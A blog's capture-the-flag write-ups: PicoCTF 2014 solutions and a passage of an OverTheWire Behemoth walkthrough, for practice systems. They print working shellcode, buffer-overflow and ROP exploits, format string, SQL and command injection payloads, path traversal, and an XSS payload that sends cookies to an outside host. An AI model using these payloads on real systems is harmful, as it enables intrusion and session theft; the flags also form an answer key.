Image link: https://picoctf.com/problem-static/misc/robo-photo/robophoto.jpg

Solution:
Right-click on the image -> Search Google for this image
Input: The Positronic Man

Flag: The Positronic Man

Cryptology – Caesar (20)

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt

Link: link: https://picoctf.com/api/autogen/serve/encrypted.txt?static=false&pid=6d086db90583fcea884ecf10f2dc6319

Solution:
Browse to: http://md5decrypt.net/en/Caesar/
Paste encrypted message -> Bruteforce
# Note Caesar(3): thesecretpassphraseiseowfsewwuhretksysnkdfequdpnddm
Input: eowfsewwuhretksysnkdfequdpnddm

Flag: eowfsewwuhretksysnkdfequdpnddm

Web Exploitation – No Comment (20)

The CD you find has a copy of your father’s website: homepage.html. Maybe something is hidden in the site…

Link: https://picoctf.com/api/autogen/serve/homepage.html?static=false&pid=3099c443d360a2514f17f155fb65d5d2

Solution:
Right-click -> View Page Source Code
Input: flag_3d704fd985fc224bc7370811cef42ffa0dd103d1

Flag: flag_3d704fd985fc224bc7370811cef42ffa0dd103d1

Miscellaneous – Common Vulnerability Exercise (20)

This disc is encrypted. The surprisingly elaborate password hint refers to “the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec”. If you found this “CVE-ID” thingy, it’d probably be the password.

Link: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures

Solution:
Google: 2014 cve firefox buffer overflow speech codec
Input: CVE-2014-1542

Flag: CVE-2014-1542

Cryptology – The Valley of Fear (20)

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)

Link: https://picoctf.com/problem-static/crypto/the-valley-of-fear/book.txt

Solution:
# See document_word_finder.py
python document_word_finder.py book.txt search.txt
”’
(1, 9, 4) = the
(4, 2, 8) = flag
(4, 8, 3) = is
(7, 1, 5) = Ceremonial
(8, 10, 1) = plates
”’
Input: Ceremonial plates

Flag: Ceremonial plates

Web Exploitation – Internet Inspection (30)

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?

Link: https://picoctf.com/api/autogen/serve/index.html?static=false&pid=28baa70afa1967ff63b201f687b7533e

Solution:
Right-click -> View Page Source Code
Right-click -> Inspect Element
Inspect the “content-table” -> “contents”
Input: flag_d0aacebc468789b5fed8cd4a24a568a56e0be3bf

Flag: flag_d0aacebc468789b5fed8cd4a24a568a56e0be3bf

Forensics – Grep is Still your Friend (40)

The police need help decrypting one of your father’s files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys .

Solution:
ssh pico5131@shell2014.picoctf.com -p 22
ls /
cd /problems/grepfriends
grep daedaluscorp.txt.enc keys
Input: b2bee8664b754d0c85c4c0303134bca6

Flag: b2bee8664b754d0c85c4c0303134bca6

Cryptology – Substitution (50)

There’s an authorization code for some Thyrin Labs information here, along with someone’s favorite song. But it’s been encrypted! Find the authorization code.
encrypted.txt

Link: https://picoctf.com/api/autogen/serve/encrypted.txt?static=false&pid=0cffe6fd67e39c91501cb9d843984cb2

Solution:
Browse to: http://quipqiup.com/index.php
Input the encrypted text -> Solve
Input: beprepared

Flag: beprepared

Web Exploitation – Javascrypt (40)

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

Link: https://picoctf.com/api/autogen/serve/index.html?static=false&pid=b1d725db54a1fb027ea6bbd78f9a7d0b

Solution:
Right-click -> View Page Source Code
Right-click -> Inspect Element -> Console
key
Input: flag_831

Flag: flag_831

Reverse Engineering – Basic ASM (60)

We found this program snippet.txt, but we’re having some trouble figuring it out. What’s the value of %eax when the last instruction (the NOP) runs?

Link: https://picoctf.com/api/autogen/serve/snippet.txt?static=false&pid=654a1385b6d2f9091efe2af864d8d2da

Solution:
Copy the assembly into Python format
# See basic_asm.py
python basic_asm.py
Input: 483369467

Flag: 483369467

Forensics – Pickle Jar (30)

The police station offers free pickles to police officers. However, someone stole the pickles from the pickle jar! You find a clue on a USB drive left at the scene of the crime.

Solution:
jar -xf pickle.jar
cat picke.p
Input: YOUSTOLETHEPICKLES

Flag: YOUSTOLETHEPICKLES

Forensics – Redacted (50)

You found a letter that may shed light on recent events.

Link: https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

Solution:
# We need to extract the images in the PDF
pdfimages Redacted.pdf ./
Input: one_two_three_four

Flag: one_two_three_four

Reverse Engineering – Tower of Toast (90)

Everyone loves the Tower of Hanoi puzzle. Well it appears the Toaster Bot wants you to play an essentially identical game called “Towers of Toast”. The game doesn’t seem to be working though… Can you win anyway? Perhaps by loading a winning saved game? Download the Java code here.

Link: https://picoctf.com/problem-static/reversing/towers-of-toast/Main.java

Solution:
gedit Main.java
# We will change the random function from random to fixed

Change:

for (int i = 0; i < GAME_SIZE; i++) {
int pole = rand.nextInt(3);
if (pole == 0) { pole1.add(BigInteger.valueOf(i)); }
else if (pole == 1) { pole2.add(BigInteger.valueOf(i)); }
else { pole3.add(BigInteger.valueOf(i)); }
To:

for (int i = 0; i < GAME_SIZE; i++) {
int pole = 0;
if (pole == 0) { pole1.add(BigInteger.valueOf(i)); }
else if (pole == 1) { pole2.add(BigInteger.valueOf(i)); }
else { pole3.add(BigInteger.valueOf(i)); }

javac Main.java
java Main
new
Input: 166589903787325219380851695350896256250980509594874862046961683989710

Flag: 166589903787325219380851695350896256250980509594874862046961683989710

Web Exploitation – Delicious! (60)

You have found the administrative control panel for the Daedalus Coperation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

Solution:
Open Cookie Manager+
Search for ‘pico’ -> web2014
Edit the content of session_id: 66
Refresh
Input: session_cookies_are_the_most_delicious

Flag: session_cookies_are_the_most_delicious

Forensics – Intercepted Post (40)

We intercepted some of your Dad’s web activity. Can you get a password from his traffic?. You can also view the traffic on CloudShark.

Link: https://www.cloudshark.org/captures/5d19d8de342c?filter=http.request.method

Solution:
Input: http.request.method == “POST” -> Press Enter
Check the second POST request and copy the password
Browse to: http://meyerweb.com/eric/tools/dencoder/
Input: flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
Copy the decoded string
Input: flag{pl$_$$l_y0ur_l0g1n_form$}

Flag: flag{pl$_$$l_y0ur_l0g1n_form$}

Binary Exploitation – This is the Endian (40)

This is the end! Solving this challenge will help you defeat Daedalus’s cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print “Access Granted”.

Link: https://picoctf.com/problem-static/binary/this-is-the-endian/endian.html#1

Solution:
# Note that the input is in Ascii
# 30646521 == 0de!
# 52657663 == Revc
Input: cveR!ed0

Flag: cveR!ed0

Reverse Engineering – Cyborg Secrets (80)

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.

Solution:
Open the cyborg_defense in Binary Ninja
Look at main
# Notice 0804855b {“2manyHacks_Debug_Admin_Test”}
./cyborg_defense 2manyHacks_Debug_Admin_Test
# Copy the ouput
Input: 403-shutdown-for-what

Flag: 403-shutdown-for-what

Forensics – Spoof Proof (60)

The police have retrieved a network trace of some suspicious activity. Most of the traffic is users viewing their own profiles on a social networking website, but one of the users on the network downloaded a file from the Thyrin Labs VPN and spoofed their IP address in order to hide their identity. Can you figure out the last name of person that accessed the Thyrin files, and the two source IP addresses they used?
[Example valid flag format: “davis,192.168.50.6,192.168.50.7”]

PCAP file available here. You can also view it on CloudShark

Solution:
Open in Wireshark
Filter: arp
”’
Notice that:
CadmusCo_2b:f7:02 (08:00:27:2b:f7:02) asks Who has 192.168.50.10 with two different IP addresses
First IP address: 192.168.50.3
Second IP address: 192.168.50.4
”’
Filter: ip.addr == 192.168.50.3
# It is john.johnson
Input: Johnson,192.168.50.3,192.168.50.4

Flag: Johnson,192.168.50.3,192.168.50.4

Web Exploitation – Toaster Control (50)

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command ‘Shutdown & Turn Off’ from the control panel. Maybe the functionality is still there…

Link: http://web2014.picoctf.com/toaster-control-1040194/

Solution:
Click on one of the buttons
Edit: action=Shutdown%20%26%20Turn%20Off
Go
In
Input: flag_c49bdkeekr5zqgvc20vc

Flag: flag_c49bdkeekr5zqgvc20vc

Binary Exploitation – Write Right (50)

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

Solution:
ssh pico5131@shell2014.picoctf.com -p 22
cd /home/write_right
ls
cat write_right.c
gdb -q ./write_right
disas main
”’
Note:

0x08048667 <+154>: mov 0x804a03c,%eax
0x0804866c <+159>: cmp $0x1337beef,%eax
”’
./write_right
0x804a03c
0x804a03c
Input: arbitrary_write_is_always_right

Flag: arbitrary_write_is_always_right

Binary Exploitation – Overflow (50)

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.

Link: https://picoctf.com/problem-static/binary/Overflow1/overflow1.html

Solution:
./overflow1 $(python -c ‘print “A” * 16 + “\xce\xfa\xde\xc0″‘)
cat flag.txt
Input: ooh_so_critical

Flag: ooh_so_critical

Reverse Engineering – Function Address (60)

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

Solution:
Open ‘problem’ in Binary Ninja
Look at the find_string function
Input: 0x8048444

Flag: 0x8048444

Forensics – Supercow (40)

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Solution:
ssh pico5131@shell2014.picoctf.com -p 22
cd /home/daedalus/
ls
cat supercow.c
ln -s /home/daedalus/flag.txt ~/flag.cow
./supercow ~/flag.cow
Input: cows_drive_mooooving_vans

Flag: cows_drive_mooooving_vans

Binary Exploitation – Format (70)

This program is vulnerable to a format string attack! See if you can modify a variable by supplying a format string! The binary can be found at /home/format/ on the shell server. The source can be found here.

Solution:
ssh pico5131@shell2014.picoctf.com -p 22
cd /home/format
gdb -q ./format
p &secret
# secret is at 0x804a030
r “%p %p %p %p %p %p %p %p %p”
# secret is at 7
r $(python -c ‘print “%1337x%7$hn”‘)
# We get a shell
q
./format $(python -c ‘print “%1337x%7$hn”‘)
# We write 1337 characters and overwrite secret with “1337” by using %n
cat flag.txt
Input: who_thought_%n_was_a_good_idea?

Flag: who_thought_%n_was_a_good_idea?

Web Exploitation – Injection 1 (90)

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

Link: http://web2014.picoctf.com/injection1/

Solution:
admin’ —
Input: flag_vFtTcLf7w2st5FM74b

Flag: flag_vFtTcLf7w2st5FM74b

Forensics – PNG or Not? (100)

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

Link: https://picoctf.com/problem-static/forensics/png-or-not/image.png

Solution:
Download the image
cp image.png image.zip
Open the zip file -> Open flag.txt
Input: EKSi7MktjOpvwesurw0v

Flag: EKSi7MktjOpvwesurw0v

Binary Exploitation – Overflow 2 (70)

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.

Link: https://picoctf.com/problem-static/binary/Overflow2/overflow2.html#1

Solution:
objdump -d overflow2 | grep “shell”
# Getting the address of give_shell, 0x080484ad
./overflow2 $(python -c ‘print “A” * 28 + “\xad\x84\x04\x08″‘)
cat flag.txt
Input: controlling_%eip_feels_great

Flag: controlling_%eip_feels_great

Cryptology – ZOR (50)

Daedalus has encrypted their blueprints! Can you get us the password?
ZOR.py
encrypted

Solution:
# See zor.py or detect_singleChar_XOR.py
python zor.py
Input: 6a79aa0aca48c8579624a1aabebca7

Flag: 6a79aa0aca48c8579624a1aabebca7

Web Exploitation – Make a Face (100)

It looks like Daedalus is working on a new project to generate digital avatars for use online. After taking a look, at their site: http://makeaface.picoctf.com/ it seems like there is a pretty good chance the project isn’t completed, and may have some bugs. This might be the break we’ve been looking for to get inside their network.

Solution:
Right-click -> View Page Source Code
Open Burp Proxy with Intercept On
Edit any of the options
In Burp Decoder, URL encode: ;ls |
Copy the output: %3b%6c%73%20%7c
Edit all of the request parameters to the above output
Right-click -> Do Intercept – Response to this request
Forward
# We see an interesting “secret file”, but it’s not the flag
In Burp Decoder, URL encode: ;cat * |
Copy the output: %3b%63%61%74%20%2a%20%7c
Edit all of the request parameters to the above output
Right-click -> Do Intercept – Response to this request
Forward
# We get the real flag
Input: why_did_we_stop_using_perl_again?

Flag: why_did_we_stop_using_perl_again?

Binary Exploitation – Guess (75)

This program requires you to guess a random 32-bit number! Sounds difficult, right? There is a server running at vuln2014.picoctf.com:4546, and the source can be found here.

Solution:
Download and look at guess.c
# Let’s try a format string attack
nc vuln2014.picoctf.com 4546
%i %i %i %i
Input the fourth number (1523423779 in my case)
Input: leak_the_seakret

Flag: leak_the_seakret

Forensics – Droid App (80)

An Android application was released for the toaster bots, but it seems like this one is some sort of debug version. Can you discover the presence of any debug information being stored, so we can plug this?
You can download the apk here.

Link: https://picoctf.com/problem-static/forensics/DroidApp/ToasterBot.apk

Solution:
dex2jar ToasterBot.apk
Open the .jar file
Extract the picoapp folder
jad ToasterActivity.class
cat ToasterActivity.jad
Input: what_does_the_logcat_say

Flag: what_does_the_logcat_say

Forensics – Snapcat (80)

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.

Link: https://picoctf.com/problem-static/forensics/snapcat/disk.img

Solution:
foremost disk.img
Look in the jpg folder
Input: i_can_has_cheezburger

Flag: i_can_has_cheezburger

Binary Exploitation – ExecuteMe (80)

This program will run whatever you send to it! Try to get the flag! The binary can be found at /home/execute/ on the shell server. The source can be found here.

Link: https://picoctf.com/problem-static/binary/ExecuteMe/execute.c

Solution:
ssh pico5131@shell2014.picoctf.com -p 22
cd /home/execute/
cat execute.c
ltrace ./execute
# Notice the program reads our input as buf
(python -c ‘print “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘; cat) | ./execute
# We write our own execve /bin/sh shellcode
whoami
cat flag.txt
Input: shellcode_is_kinda_cool

Flag: shellcode_is_kinda_cool

Miscellaneous – OBO (90)

This password changing program was written by an inexperienced C programmer. Can you some find bugs and exploit them to get the flag? The problem can be found at /home/obo/ on the shell server, and the source code can be downloaded here

Link: https://picoctf.com/problem-static/binary/OBO/obo.c

Solution:
ssh pico5131@shell2014.picoctf.com -p 22
cd /home/obo/
cat obo.c
# Notice the for loops are using a <= instead of a <
# This causes the program to write 1 to new_password
python -c ‘print “abcdefg123456789\n\1″‘ | /home/obo/obo
# We control the program
cd
vi python

#!/bin/sh
cat /home/obo/flag.txt

wq
# We create a bash script that reads the flag
chmod +x python
export PATH=/home_users/pico5131:$PATH
# We set the path to our current folder so that our fake Python is used
python2 -c “print ‘abcdefg123456789\n\1′”| /home/obo/obo
Input: watch_your_bounds

Flag: watch_your_bounds

Web Exploitation – secure_page_service (100)

The bad guys have hidden their access codes on an anonymous secure page service. Our intelligence tells us that the codes was posted on a page with id 43440b22864b30a0098f034eaf940730ca211a55, but unfortunately it’s protected by a password, and only site moderators can view the post without the password. Can you help us recover the codes?

Link: http://sps.picoctf.com/

Solution:
Under Register:
user: okok
pass: okokokokok
Register
After registering, enter the credentials to log in
View a Page: 43440b22864b30a0098f034eaf940730ca211a55 -> Go!
# The ‘Report to Moderator’ functionality has the mod review our page
# This may allow for session hijacking
Create a page: location.href=(“http://requestb.in/xn3iqcxn?c=”+document.cookie) -> Password: ok -> Create
# Take note of the page id
View a Page: ca81c957d18c2d6fb8016e60fd7494e114301395 -> Go!
Report to Moderator
Refresh requestbin page
# Note the PHPSESSID: 9kahvopls1uucfd8b7suenmhn1
In Cookie Manager+: Edit the sps.picoctf.com PHPSESSID to: 9kahvopls1uucfd8b7suenmhn1
View a Page: 43440b22864b30a0098f034eaf940730ca211a55 -> Go!
Input: wow_cross_site_scripting_is_such_web

Flag: wow_cross_site_scripting_is_such_web

Web Exploitation – Potentially Hidden Password (100)

This Daedalus Corp. website loads images in a rather odd way… [Source Code]

Link 1: http://web2014.picoctf.com/potentially-hidden-password-3878213/
Link 2: https://picoctf.com/problem-static/web/potentially-hidden-password/index.phps

Solution:
”’
In the provided source code we can see that we need to load “/resources/config/admin_mode.config” in order to get the flag
”’
Open Burp Proxy with Intercept On
Refresh the web app
Forward
file=/resources/config/admin_mode.config
Right-click -> Do intercept -> Response to this request
Forward everything
”’
Note the error:
No such file: /resources/files//resources/config/admin_mode.config
”’
Refresh the web app
Forward
file=../secrets/flag
Right-click -> Do intercept -> Response to this request
Forward everything
Input: i_like_being_included

Flag: i_like_being_included

Binary Exploitation – ROP 1 (100)

This binary is running on a machine with ASLR! Can you bypass it? The binary can be found at /home/rop1/ on the shell server. The source can be found here.

Solution:
python login.py
cd /home/rop1/
cat rop1.c
gdb -q ./rop1
disas main
disas vuln
br *vuln+25
r aaaa
x/50x $eax
# Note that eax contains our a’s at address 0xffffd6a0 (in my case)
# This means that when vuln returns, eax contains our input
r $(python -c ‘print “A” * 100’)
c
# We continue testing…
r $(python -c ‘print “A” * 76 + “B” * 4′)
# We control EIP
objdump -d rop1 | grep “call.*eax”
”’
We search for a ROP gadget that calls eax
Note the first result 0x8048d86 (in my case)
We will overwrite eip with this ROP gadget
This makes the program execute our input, as the gadget calls eax and eax is our input
We will use our previous shellcode, which is 25 bytes in size
76 – 25 = 51
Our exploit will look like:
<shellcode><padding><ROP gadget>
”’
./rop1 $(python -c ‘print “\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80” + “A” * 51 + “\x86\x8d\x04\x08″‘)
cat flag.txt
Input: theres_no_need_to_guess

Flag: theres_no_need_to_guess

Web Exploitation – Injection 2 (110)

Daedalus Corp.’s login woes continue. Can you sign in using their latest login system?

Link: http://web2014.picoctf.com/injection2/

Solution:
Read the source code: http://web2014.picoctf.com/injection2/login.phps
”’
Notice the if statements:
1) the number of rows has to be 1
2) the supplied password and the password being queried must be the same
3) user_level has to be 1337

”’
Open Burp Proxy with Intercept On
Login
username=SELECT * FROM users WHERE username=’$username’ AND password=’$password’
debug=1
Forward
# Take note of the debug information
Username: ‘UNION ALL SELECT null, null, “” AS password, null, 1337 AS user_level #
# UNION ALL concatenates the queries’ results
# Hence it can return one row with all the data we want to supply/retrieve
Login
Input: flag_nJZAKGWYt7YfzmTsCV

Flag: flag_nJZAKGWYt7YfzmTsCV

Reverse Engineering – Netsino (120)

Daedalus seems to have ties to a shady online gambling boss. Maybe if you beat him at his own game, you can persuade him to share some useful info. The server is running on vuln2014.picoctf.com:4547 and the source code can be found here.

Solution:
Look at netsino.c
# Notice the program does not look for negative numbers
# We can exploit this by trigerring an overflow with a large enough number
# max long = 2,147,483,647 ; we can use 3000000000
nc vuln2014.picoctf.com 4547
Bet: 3000000000
Selection: 5

Input: i_wish_real_casinos_had_this_bug

Flag: i_wish_real_casinos_had_this_bug

Cryptography – Repeated XOR (70)

There’s a secret passcode hidden in the robot’s “history of cryptography” module. But it’s encrypted! Here it is, hex-encoded: encrypted.txt. Can you find the hidden passcode?

Link: https://picoctf.com/api/autogen/serve/encrypted.txt?static=false&pid=82a42d1d859d5c2140e8942848e5db0e

Solution:
# See break_repeatingKeyXOR.py
python break_repeatingKeyXOR.py encrypted.txt

Flag: 49c8d7311c0fb8a7dba099b4708661b8da5b9949

Web Exploitation – Massive Fail (120)

Fed up with their recent PHP related issues, Daedalus Corp. has switched their website to run on Ruby on Rails (version 3.1.0) instead. Their brand new registration page does not seem like much of an improvement though… [Source].

Link: http://web2014.picoctf.com:5000/
Source: https://picoctf.com/problem-static/web/massive-fail/daedalus.zip

Solution:
Read app/controllers/user_controller.rb
Read db/schema.rb
Open Burp Proxy with Intercept On
Name: a
Username: a
Password: a
Register
Before the &commit, add: &user%5Bis_admin%5D=true
Forward
Input: no_framework_is_without_sin

Flag: no_framework_is_without_sin

Binary Exploitation – No Overflow (140)

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at /home/no_overflow/ on the shell server. The source can be found here.

Link: https://picoctf.com/problem-static/binary/NoOverflow/no_overflow.c

Solution:
gedit no_overflow.c
# Notice how the overflow prevention mechanism is implemented
# This can easily be bypassed by using negative numbers
python login.py
cd /home/no_overflow/
ls
mkdir /tmp/try
cp no_overflow /tmp/try
cd /tmp/try
ulimit -c unlimited
# This command enables core dumps
(echo -1; python -c ‘print “A” * 270 + “BBBB”‘; echo) | ./no_overflow
gdb -q no_overflow core
# Note that we need 268 in padding to control EIP
# We can now put in our shellcode
(echo -1; python -c ‘print “A” * 268 + “BBBB” + “\x90” * 50 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘; echo) | ./no_overflow
gdb -q no_overflow core
x/50x $esp
# Let us choose address 0xffffd6f0 (may differ in your case)
cd /home/no_overflow
(echo -1; python -c ‘print “A” * 268 + “\xf0\xd6\xff\xff” + “\x90” * 50 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘; cat) | ./no_overflow
cat flag.txt
Input: what_is_your_sign

Flag: what_is_your_sign

Web Exploitation – Injection 3 (130)

Daedalus Corp. has increased the security of their login prompt. Is it possible to work around their new defenses?

Link: http://web2014.picoctf.com/injection3/

Solution:
Right-click login.php -> View Page Source Code
Open ‘Admin’ in a new tab -> View Source
”’
This is similar to Injection 2, where we have to use the UNION command and enable debugging
”’
In the lookup_user.php page: id=NULL UNION ALL SELECT 1,2,3,4,5,6,group_concat(table_name) FROM information_schema.tables
# Listing all the tables
# super_secret_users seems to be what we’re looking for
id=NULL UNION ALL SELECT 1,2,3,4,5,6,group_concat(password) FROM super_secret_users
In the login page: admin:not_the_flag_super_secret_admin_password
Input: flag_2tc7ZPa5PEhcyZJXgH

Flag: flag_2tc7ZPa5PEhcyZJXgH

Binary Exploitation – What The Flag (140)

This binary uses stack cookies to prevent exploitation, but all hope is not lost. Read the flag from flag.txt anyways! The binary can be found at /home/what_the_flag/ on the shell server. You can solve this problem interactively here. The source can be found here.

Link: https://picoctf.com/problem-static/binary/WhatTheFlag/what_the_flag.html
Source: https://picoctf.com/problem-static/binary/WhatTheFlag/what_the_flag.c

Solution:
python login.py
cd /home/what_the_flag/
cat what_the_flag.c
”’
Notice the password: 1337_P455W0RD
Also notice the password buffer size is 16
Notice that it is set to read “not_the_flag.txt”
We need to set it to flag.txt
We can change the file_name pointer to point to f(lag) to achieve this goal
”’
objdump -s what_the_flag | grep “flag.txt”
# Note the address 0x8048778
# We have to adjust for the right address: 0x804877f
python -c ‘print “1337_P455W0RD\x00aa\x7f\x87\x04\x08″‘ | ./what_the_flag
Input: who_needs_%eip

Flag: who_needs_%eip

Reverse Engineering – Police Records (140)

A Theseus double agent has infiltrated the police force but the police won’t give you access to their directory information. Thankfully you found the source code to their directory server. Write a client to interact with the server and find the duplicated badge number! The flag is the badge number.
The server is running on vuln2014.picoctf.com:21212.

Link: https://picoctf.com/problem-static/reversing/PoliceRecords/directory_server.py

Solution:
# See police.py
python3 police.py
Input: 1430758

Flag: 1430758

Web Exploitation – Injection 4 (150)

Daedalus Corp. has once again improved their login service. They’re so confident, in fact, that they added a new registration feature. Can you find a way to login as ‘admin’?

Link: http://web2014.picoctf.com/injection4/

Solution:
”’
The new registration feature and its source code indicate this might be our way in
Looking at the register.php source code we can see that:
1) If a user exists, we’ll get “Someone has already registered”
2) The username isn’t escaped, so we can add other queries
3) If part of the password also matches, we’ll get the same message as #1

We can craft a script that will bruteforce the password one char at a time.
In this script we can use the LIKE statement along with the wildcard char %
LIKE is used to compare a value to similar values using wildcards,
so it is perfect for our purposes.

See injection_4.py
”’
python injection_4.py
# We get the password: youllneverguessthispassword
Log in as: admin:youllneverguessthispassword
Input: whereof_one_cannot_speak_thereof_one_must_be_silent

Flag: whereof_one_cannot_speak_thereof_one_must_be_silent

Binary Exploitation – Best Shell (160)

This shell is super useful! See if you can get the flag! The binary can be found at /home/best_shell/ on the shell server. The source can be downloaded here.

Solution:
Download the source code
”’
Notice in the input_handler:
char cmd[32];
void (*handler)(char *);

Notice in the rename_handler:
if (found != NULL){
strcpy(found->cmd, new);

This means that if we overflow the buffer with 32 chars, we can set the function pointer handler to an arbitrary address
We have to pick an address from shell_handler

”’
python login.py
cd /home/best_shell/
gdb -q ./best_shell
disas shell_handler
# Since the program requires authentication, we can use the geteid address
# to bypass this check; address: 0x080489d7

(python -c ‘import struct; print “rename lol ” + “a” * 32 + struct.pack(“<I”, 0x080489d7) + “\n” + “a” * 32 + struct.pack(“<I”, 0x080489d7) + “\n”‘; cat) | ./best_shell

cat flag.txt
Input: give_shell_was_useful

Flag: give_shell_was_useful

End-Notes: 

Very fun CTF. I especially liked the video game format, which made it even more fun.

Index

This is a sticky post. Below you can find links to all of my write-ups.

Return Oriented Programming Series

• Introduction
• Setup
• CTF and Wargames
• Real-World Exploits

Web Exploitation

• Google XSS Game
• OWASP WebGoat 1.2
• Realistic – Hack This Site

Binary Exploitation

• Narnia – Over The Wire
• Behemoth – Over the Wire 
• Microcorruption
• Toddler’s Bottle – Pwnable.kr
• Rookiss – Pwnable.kr
• Pwnable.tw

Reverse Engineering

• Reversing.kr
• Reverse Engineering Firmware: Linksys WRT1900AC
• Softbank Pepper: A short robot overview

Capture the Flags

• EkoParty CTF 2016
• PicoCTF 2014
• Game of Thrones CTF 1

General Network Exploitation

• Kioptrix (1-5)
• Tr0ll (1-2)
• SickOS (1.1-1.2)

Offensive Security Certified Professional (OSCP) Journey

• OSCP: Preparation for the OSCP & My Experience So Far
• OSCP: 80% Done with the PWK Course
• OSCP: Done with the course, Unto the Labs
• OSCP: Nine Days In, 21 Machines Rooted
• OSCP: Officially OSCP Certified

Programs:

• Tuoni Web Attacking Program
• Cryptan Cryptography Suite
• PreEx Intelligence Gathering Program
• CVE_Compare Windows Vulnerability Scanning Tool

 

I will keep updating this post, adding more links as I add more write-ups.

OvertheWire – Behemoth Write-Up

What follows is a write-up of a binary exploitation war game, OverTheWire Behemoth.

The war game has players “deal with a lot of regular vulnerabilities found out in the wild.” Players get to exploit vulnerabilities such as buffer overflows, race conditions and privilege escalation.

Note that no source code is given, hence there is no clear challenge description but for comprising the system. The players get a flag if they succeed in compromising the system.

[*] STATUS: COMPLETED

Level 0

Solution:
cd /behemoth
file behemoth0
ltrace ./behemoth0
# Running a library call tracer
Input: aaaa
# strcmp() shows us the correct password
./behemoth0
Input: eatmyshorts
cat /etc/behemoth_pass/behemoth1

Flag: aesebootiv

Level 1

Solution:
cd /behemoth
ltrace ./behemoth1
Input: aaaa
”’
gets() is being used with a 191 size limit
gets() doesn’t stop writing at the end of the size limit, instead continuing to write past the end and into memory it doesn’t own
We can trigger a buffer overflow

Let us reuse our good ol’ 25-byte shellcode
”’
export EGG=”$(python -c ‘print (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″)’)”
gdb -q ./behemoth1
disas main
br *main+50
r
Input: aaaa
x/50x $esp+600
# The 90’s preceding our shellcode start at 0xffffd8a8

”’
We are going to use Metasploit pattern_create.rb and pattern_offset.rb
pattern_create.rb will create a unique pattern for us
We will feed the program this pattern and then note the value it outputs
We will then use this value with pattern_offset.rb to determine at which point
in our pattern the value appears – that will be our offset
”’

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150
# We create a pattern
Copy the output
r
Input: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
n
# Note the output: 0x63413663
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x63413663
# Our offset is at 79
q
(python -c ‘print (“A” * 79) + (“\xb8\xd8\xff\xff”)’;cat) | /games/behemoth/behemoth1
cat /etc/behemoth_pass/behemoth2

Flag: eimahquuof

Level 2

Solution:
cd /behemoth
ltrace ./behemoth2
# We need to get around this touch restriction, which seems to be the key point
# The program is set to run whatever ‘touch’ is
cd /tmp
mkdir peanuts
cd peanuts
ln -s /behemoth/behemoth2 behemoth2
# Create a symbolic link
echo “/bin/sh” > touch
chmod +x ./touch
# Create a fake ‘touch’ that gets us a shell
export PATH=/tmp/peanuts/:$PATH
# Set a new fake path
./behemoth2
cat /etc/behemoth_pass/behemoth3

Flag: nieteidiel

Level 3

Solution:
cd /behemoth
file behemoth3
ltrace ./behemoth3
gdb -q ./behemoth3
disas main
r
Input: aaaabbbb.%x.%x.%x.%x.%x.%x.%x.%x
# The program has a format string vulnerability
# Our offset is at 6
q
objdump -R behemoth3
# We are going to overwrite the puts() in the global offset table
# puts() address is 0x08049790
